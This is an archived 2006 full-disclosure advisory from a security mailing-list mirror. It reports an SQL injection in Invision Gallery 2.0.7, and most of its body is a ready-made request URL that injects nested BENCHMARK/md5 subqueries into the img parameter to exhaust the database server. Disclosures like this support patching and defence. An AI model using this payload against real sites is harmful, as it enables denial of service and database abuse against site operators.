Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] deV!L`z Clanportal - Arbitrary File Upload [061124b]

  [Full-disclosure] phpmyfaq exploit using PHP bug, CVE-2006-1490

  LifeType version 1.1.2 Multiple Path Disclosure Vulnerabilities

  Woltlab Burning Board 2.3.X XSS Vulnerability (0-Day) FIXED VERSION

From:infection_(at)_mail.kz <infection_(at)_mail.kz>
Date:01.12.2006
Subject:Invision Gallery 2.0.7 SQL Injection Vulnerability

Invision Gallery 2.0.7

DOS attak can be performed

index.
php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&
img=111 OR id IN (SELECT
BENCHMARK(10000000,BENCHMARK(10000000,
md5(current_date))) FROM ipb_gallery_images )

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server